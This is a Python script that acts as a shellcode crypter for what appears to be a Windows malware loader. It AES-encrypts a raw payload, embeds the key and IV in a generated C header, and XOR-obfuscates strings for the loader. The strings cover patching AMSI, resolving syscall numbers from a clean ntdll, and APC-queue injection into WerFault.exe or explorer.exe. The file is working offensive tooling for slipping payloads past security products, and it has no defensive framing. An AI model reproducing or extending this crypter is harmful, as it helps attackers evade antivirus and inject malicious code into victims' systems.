#!/usr/bin/env python3
"""crypt.py - encrypt raw shellcode -> AES-256-CBC, emit payload.h

Emits:
  - ENC_PAYLOAD / ENC_PAYLOAD_LEN   (AES-256-CBC ciphertext, zero-padded)
  - AES_KEY[32] / AES_IV[16]
  - XOR-obfuscated string tables + per-string keys for the loader
Self-tests by decrypting its own output before writing.
"""
import os
import sys
import hashlib

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# strings the loader needs at runtime; each gets its own XOR key
STRINGS = [
    "ntdll.dll",
    "C:\\Windows\\System32\\ntdll.dll",
    "C:\\Windows\\System32\\WerFault.exe",
    "explorer.exe",
    "amsi.dll",
    "AmsiScanBuffer",
    # Zw* names used for SSN resolution against the clean ntdll image
    "ZwAllocateVirtualMemory",
    "ZwWriteVirtualMemory",
    "ZwProtectVirtualMemory",
    "ZwQueueApcThread",
    "ZwResumeThread",
    "ZwQueryInformationProcess",
    "ZwReadVirtualMemory",
]


def xor_key(i):
    return (0x31 + i * 0x07) & 0xFF


def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} <shellcode.bin> <payload.h>")
        sys.exit(1)

    plain = open(sys.argv[1], "rb").read()
    key = os.urandom(32)
    iv = os.urandom(16)

    # zero-pad to AES block size
    pad = (16 - len(plain) % 16) % 16
    padded = plain + b"\x00" * pad

    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    cipher = enc.update(padded) + enc.finalize()

    # self-test: decrypt back and compare
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    check = dec.update(cipher) + dec.finalize()
    assert check[:len(plain)] == plain, "roundtrip self-test failed"
    assert all(b == 0 for b in check[len(plain):]), "padding mismatch"

    out = []
    out.append("/* auto-generated by crypt.py - do not edit */")
    out.append("#pragma once")
    out.append("#ifndef PAYLOAD_H")
    out.append("#define PAYLOAD_H")
    out.append("")
    out.append(f"/* shellcode: {len(plain)} bytes plaintext, {len(cipher)} bytes ciphertext (AES-256-CBC, zero-padded) */")
    out.append(f"/* plaintext sha256: {hashlib.sha256(plain).hexdigest()} */")
    out.append(f"#define ENC_PAYLOAD_LEN {len(cipher)}")
    out.append("static const unsigned char ENC_PAYLOAD[] = {")
    for i in range(0, len(cipher), 16):
        out.append("    " + ",".join(f"0x{b:02X}" for b in cipher[i:i+16]) + ",")
    out.append("};")
    out.append("")
    out.append("static const unsigned char AES_KEY[32] = {" + ",".join(f"0x{b:02X}" for b in key) + "};")
    out.append("static const unsigned char AES_IV[16]  = {" + ",".join(f"0x{b:02X}" for b in iv) + "};")
    out.append("")

    for i, s in enumerate(STRINGS):
        k = xor_key(i)
        enc_s = bytes(c ^ k for c in s.encode())
        var = f"S{i}"
        out.append(f"/* \"{s}\" */")
        out.append(f"static const unsigned char {var}[] = {{{','.join(f'0x{b:02X}' for b in enc_s)}}};")
        out.append(f"#define {var}_LEN {len(s)}")
        out.append(f"#define {var}_KEY 0x{k:02X}")
        out.append("")

    out.append("#endif /* PAYLOAD_H */")
    open(sys.argv[2], "w").write("\n".join(out))

    print(f"[+] {sys.argv[1]}: {len(plain)} bytes -> AES-256-CBC {len(cipher)} bytes")
    print(f"[+] wrote {sys.argv[2]} (key/iv/strings embedded, roundtrip verified)")


if __name__ == "__main__":
    main()
